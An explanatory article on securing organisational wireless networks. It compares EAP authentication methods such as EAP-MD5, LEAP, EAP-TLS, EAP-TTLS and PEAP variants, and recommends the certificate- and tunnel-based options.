On the business side of the house there are many benefits to a wireless network. The first is incorporated directly into the name, it is wireless. A wireless network can add the benefit to business of reducing the cost associated with moves, adds and changes (MACs). Another great benefit is that users can have meetings in boardrooms or offices and take notes directly to their laptop without having to transcribe them following the meeting. This can translate into a productivity boost.
The steps listed for securing a SOHO wireless connection will help greatly in securing a home or home office wireless connection. However, in order to increase the security level for an organization, further security methods for the Extensible Authentication Protocol (EAP) such as EAP-TLS (Transport Layer Security) or Protected Extensible Authentication Protocol (PEAP) must be implemented.
What is EAP?
EAP stands for Extensible Authentication Protocol that while can be applied to wired LAN connections is most commonly found in wireless implementations. It is important to note that EAP is not a specific authentication method but a framework that provides the common authentication functions and as such there are numerous implementations of EAP. EAP takes authentication of a wireless client to a more secure level by forcing the client to authenticate securely to the wireless access point (AP) so that a secure key can be negotiated between the access point and the wireless client.Common implementations of EAP and their use in wireless security are:
- EAP-MD5 – EAP-MD5 is a Challenge Handshake Authentication Protocol (CHAP) which requires that a shared secret be established. The shared secret is used to hash the challenge from the AP and verified by the authenticator. EAP-MD5 offers little security due to the ability for an attacker to mount an offline attack against the shared secret.
- EAP-PSK – EAP-PSK also relies on a shared secret and while the implementation offers a little more security than EAP-MD5 the ability for an attacker makes it inappropriate for higher level security requirements.
- LEAP – Lightweight Extensible Authentication Protocol (LEAP) was created by CISCO to address the insecurity associated with Wireless Equivalent Privacy (WEP) and uses MSCHAPv2 for authentication. LEAP transmits the username in the clear and exposes the password to offline dictionary attacks of the password as it is transmitted and can often be cracked quicker than WEP alone.
- EAP-TLS – EAP-TLS requires a server side PKI based certificate that the client trusts to authenticate the server and a client side PKI based certificate to authenticate the client to the server. The use of smart cards instead of the client based certificate store can greatly enhance the security of the client based certificate. The requirement for a client based certificate can make EAP-TLS more difficult to implement.
- EAP-TTLS – EAP-TTLS is quite similar to EAP-TLS but removes the necessity to have a client side certificate for authentication. A server based certificate authenticates the server to the client and then uses the secure authentication to establish a secure connection to the client where standard username/password authentication can be performed via this secure tunnel.
- PEAP-MSCHAPv2 – PEAP-MSCHAPv2 is very similar to EAP-TTLS in that it only requires a server side certificate to authenticate the server to the client and establish a secure tunnel where MSCHAPv2 authentication can be performed. Similar to EAP-TLS, PEAP-MSCHAPv2 is widely supported but still transmits the username in the clear. PEAP-TTLS offers slightly better security than PEAP-MSCHAPv2 as the username is transmitted to the server via an encrypted channel. PEAP-TTLS is less widely supported than PEAP-MSCHAPv2.
- PEAP-GTC – PEAP-GTC offers the same benefits of PEAP-MSCHAPv2 but instead of relying on MSCHAPv2 password based authentication it uses a security token for authentication.
Conclusion
Organizations wishing to implement higher security for their wireless environments should rely on EAP-TLS, EAP-TTLS, PEAP-MSCHAPv2 or PEAP-GTC. Which method of authentication an organization chooses can depend on the operating environment in use within the organization and the ease of which one method can be deployed versus another one.Organizations that are primarily Microsoft based may find PEAP-MSCHAPv2 or EAP-TLS fairly easy to deploy but organizations that leverage other vendor’s technologies may find it beneficial to use PEAP-GTC or EAP-TTLS. No matter which authentication method that is chosen, an organization will have to invest some time in configuring back end systems for authentication but he security benefits definitely are higher.
